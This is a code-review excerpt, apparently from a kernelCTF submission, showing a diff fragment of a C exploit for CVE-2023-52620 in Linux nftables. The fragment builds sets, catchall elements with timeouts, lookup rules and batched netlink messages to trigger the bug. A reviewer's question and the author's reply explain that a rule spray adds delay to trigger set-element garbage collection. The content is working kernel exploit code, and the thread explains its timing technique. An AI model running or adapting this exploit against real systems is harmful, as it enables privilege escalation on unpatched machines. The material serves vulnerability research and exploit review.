pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/exploit/lts-6.1.78/exploit.c

```diff
@@ -0,0 +1,875 @@
+    nftnl_set_set_u32(set_leak, NFTNL_SET_DESC_SIZE, 1);
+    nftnl_set_set_u32(set_leak, NFTNL_SET_DATA_TYPE, NFT_DATA_VERDICT);
+    nftnl_set_set_data(set_leak, NFTNL_SET_DESC_CONCAT, desc_concat, 2);
+
+    struct nftnl_set * set_leak_elem =  nftnl_set_alloc();
+
+    nftnl_set_set_str(set_leak_elem, NFTNL_SET_TABLE, table1_name);
+    nftnl_set_set_str(set_leak_elem, NFTNL_SET_NAME, trig_set_name);
+
+    struct nftnl_set_elem * elem1 = nftnl_set_elem_alloc();
+
+    nftnl_set_elem_set_u32(elem1, NFTNL_SET_ELEM_FLAGS, NFT_SET_ELEM_CATCHALL);
+    nftnl_set_elem_set_str(elem1, NFTNL_SET_ELEM_CHAIN, trig_chain_name);
+    nftnl_set_elem_set_u32(elem1, NFTNL_SET_ELEM_VERDICT, NFT_GOTO);
+    nftnl_set_elem_set_u64(elem1, NFTNL_SET_ELEM_TIMEOUT, 1);
+
+    nftnl_set_elem_add(set_leak_elem, elem1);
+
+    struct nftnl_rule * rule_lookup_set_leak = nftnl_rule_alloc();
+
+    nftnl_rule_set_str(rule_lookup_set_leak, NFTNL_RULE_TABLE, table1_name);
+    nftnl_rule_set_str(rule_lookup_set_leak, NFTNL_RULE_CHAIN, chain_base_name);
+    nftnl_rule_set_u32(rule_lookup_set_leak, NFTNL_RULE_ID, 1);
+
+    struct nftnl_expr * expr_lookup = nftnl_expr_alloc("lookup");
+    nftnl_expr_set_u32(expr_lookup, NFTNL_EXPR_LOOKUP_SREG, NFT_REG32_00);
+    nftnl_expr_set_u32(expr_lookup, NFTNL_EXPR_LOOKUP_DREG, NFT_REG32_01);
+    nftnl_expr_set_str(expr_lookup, NFTNL_EXPR_LOOKUP_SET, trig_set_name);
+    nftnl_rule_add_expr(rule_lookup_set_leak, expr_lookup);
+
+    struct nftnl_rule * rule_dummy_rop = nftnl_rule_alloc();
+
+    nftnl_rule_set_str(rule_dummy_rop, NFTNL_RULE_TABLE, table1_name);
+    nftnl_rule_set_str(rule_dummy_rop, NFTNL_RULE_CHAIN, chain_rop_name);
+
+    struct nftnl_rule * rule_dummy = nftnl_rule_alloc();
+
+    nftnl_rule_set_str(rule_dummy, NFTNL_RULE_TABLE, table1_name);
+    nftnl_rule_set_str(rule_dummy, NFTNL_RULE_CHAIN, chain_dummy_name);
+
+    batch = mnl_nlmsg_batch_start(buf, BUF_SIZE);
+
+    nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
+    mnl_nlmsg_batch_next(batch);
+
+    nlh = nftnl_set_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWSET, family, NLM_F_CREATE, seq++);
+    nftnl_set_nlmsg_build_payload(nlh, set_leak);
+    mnl_nlmsg_batch_next(batch);
+
+    handle++;
+
+    nlh = nftnl_set_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWSETELEM, family, NLM_F_CREATE, seq++);
+    nftnl_set_elems_nlmsg_build_payload(nlh, set_leak_elem);
+    mnl_nlmsg_batch_next(batch);
+
+    nlh = nftnl_rule_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWRULE, family, NLM_F_CREATE, seq++);
+    nftnl_rule_nlmsg_build_payload(nlh, rule_lookup_set_leak);
+    mnl_nlmsg_batch_next(batch);
+
+    handle++;
+
+    nlh = nftnl_rule_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_DELRULE, family, 0, seq++);
+    nftnl_rule_nlmsg_build_payload(nlh, rule_lookup_set_leak);
+    mnl_nlmsg_batch_next(batch);
+
+    for(int i = 0 ; i < 0x800; i++){
```

Comment:
Comment here why you are spraying the `rule_dummy`, and what is the purpose of this spray and what would happen differently if you wouldn't do it?

Reply:
I added a comment as follows.

```
    // create delay to trigger set element GC
    for(int i = 0 ; i < 0x800; i++){
        nlh = nftnl_rule_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWRULE, family, NLM_F_CREATE, seq++);
        nftnl_rule_nlmsg_build_payload(nlh, rule_delay);
        mnl_nlmsg_batch_next(batch);

        handle++;
    }
```